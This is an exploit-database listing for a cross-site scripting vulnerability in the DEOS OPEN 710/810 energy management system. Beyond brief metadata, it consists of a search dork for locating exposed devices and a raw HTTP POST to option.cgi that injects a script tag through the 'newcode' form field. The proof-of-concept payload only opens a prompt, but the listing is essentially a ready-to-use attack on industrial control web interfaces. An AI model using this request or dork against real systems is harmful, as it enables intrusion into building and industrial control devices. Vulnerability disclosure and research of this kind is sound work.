DEOS AG OPEN 710/810 Cross Site Scripting
CVE
Category
Price
Severity
N/A
CWE-79
Unknown
Medium
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2022-03-12
CPE
cpe:cpe:/a:deos-ag:open:7.10
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030047 DEOS AG OPEN 710/810 Cross Site Scripting # Title: DEOS control systems GmbH - OPEN 710/810 EMS > Cross Site Scripting Vulnerability
# Dork: app:"DEOS AG OPEN EMS System ics device httpd"
# Vendor page: https://www.deos-ag.com/en/
# Exploit Author: n4pst3r
# Tested on: Debian
POST /cgi-bin/option.cgi?function=2 HTTP/1.1
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/cgi-bin/cosmobdf.cgi?function=%271&session=0&grafik=0
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip;deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML; like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
devcode_form=&lastcode_form=&newcode=94102_</script><script>prompt(1337)</script>
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum